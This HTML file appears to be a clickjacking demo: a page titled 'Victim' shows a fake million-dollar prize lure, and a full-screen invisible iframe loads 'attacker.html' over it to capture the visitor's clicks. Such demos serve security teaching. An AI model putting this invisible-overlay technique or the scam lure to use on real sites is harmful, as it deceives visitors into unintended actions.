<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <style>
      /* CSS Reset */
      * {
        margin: 0px;
        padding: 0px;
      }

      /* iframe to load malicious HTML */
      iframe {
        opacity: 0;
        width: 100%;
        height: 100%;
        border: none;
        position: absolute;
        top: 0;
        left: 0;
        z-index: 1;
      }

      .content {
        align-items: center;
        background-color: salmon;
        display: flex;
        flex-direction: column;
        font-size: 2rem;
        height: 100dvh;
        justify-content: center;
      }

      button {
        padding: 15px;
        font-size: 3rem;
      }
    </style>
    <title>Victim 🥺</title>
  </head>
  <body>
    <iframe src="./attacker.html"></iframe>

    <div class="content">
      <p>
        say whaaaaat 😳 you just won a million dollars! 🤑 click here to claim
        and secure the bag 💰
      </p>

      <button>click here!!!</button>
    </div>
  </body>
</html>
